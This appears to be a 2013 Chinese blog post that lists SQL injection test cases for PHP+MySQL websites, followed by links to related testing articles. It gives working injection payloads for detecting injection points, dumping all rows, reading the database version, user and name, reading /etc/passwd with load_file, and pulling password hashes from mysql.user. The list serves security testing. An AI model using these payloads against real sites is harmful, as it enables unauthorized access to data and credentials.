PHP+MySQL 网站 SQL 注入攻击测试用例

原创 2013年12月02日 14:05:54

SQL注入攻击测试用例

说明

Night
Night’ and 1=1#
Night’ and 1=2#

判断注入点。第一次是正常请求,如果存在注入漏洞,那么第二次请求得到结果应该与第一次一样,并且第三次请求得到的结果应该与前两次不同

Night’ or 1=1#

返回所有数据,常用于有搜索功能的页面

Night’ union select version()#

返回数据库版本信息

Night’ union select database()#

返回当前的库名

Night’ union select user()#

返回数据库的用户名信息

Night’ union select session_user()#

Night’ union select system_user()#

Night’ union select load_file(‘/etc/passwd’)#

读取系统文件

Night’ select user ,password from mysql.user#

返回数据库用户的密码信息,密码一般以MD5的方式存放


相关文章推荐

ASP+SQL Server SQL 注入攻击测试用例

SQL注入攻击测试用例 说明 Night-- Night’ and 1=1-- Night’ and 1=2-- 判断是否存在注入漏洞。SQL Server中...

校园“一卡通”网站攻击测试用例

全国各大高校普遍采用哈尔滨新中新电子股份有限公司的“校园一卡通”运行日常校园内的各种应用,此系统提供了一个网站后台可以提供刷卡信息查询,丢卡挂失等操作。但该网站后台实现非常不严谨,存在很多的漏洞,根据...

[转]某网站性能测试用例

转载的文章 仅供参考和学习之用。     某网站提供会员模板下载、上传、购买、支付等功能,目前进入性能测试阶段,通过性能需求可以了解到主要有以下几个性能指标需要进行测试:   ● 产品页面刷新性能  ...

web网站测试用例

  • 2017年11月13日 11:33
  • 361KB
  • 下载

网站测试用例-可以直接使用

  • 2010年09月28日 10:49
  • 218KB
  • 下载

php接口自动化测试用例编写

最近用php写完了一版项目的接口,代码有点多,意味着bug也会很多,人工测试起来有点麻烦,于是准备用php编写一个测试bug的程序。以前是没有这种意识的。这篇文章主要是提醒我未来程序写完后,能养成编写...

WEB网站常用测试用例集

  • 2012年06月13日 15:42
  • 44KB
  • 下载

p2p类网站测试用例

  • 2016年09月22日 17:56
  • 1.81MB
  • 下载

PHP多进程并发控制的测试用例

http://blog.s135.com/post/311/ 最近遇到一个问题,Linux下的PHP命令行程序作为守护进程,需要从队列文件中读一行数据,通过TCP协议发送给外地的接收服务器,再读...

网站测试用例

  • 2015年09月13日 09:49
  • 201KB
  • 下载
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:PHP+MySQL 网站 SQL 注入攻击测试用例
举报原因:
原因补充:

(最多只允许输入30个字)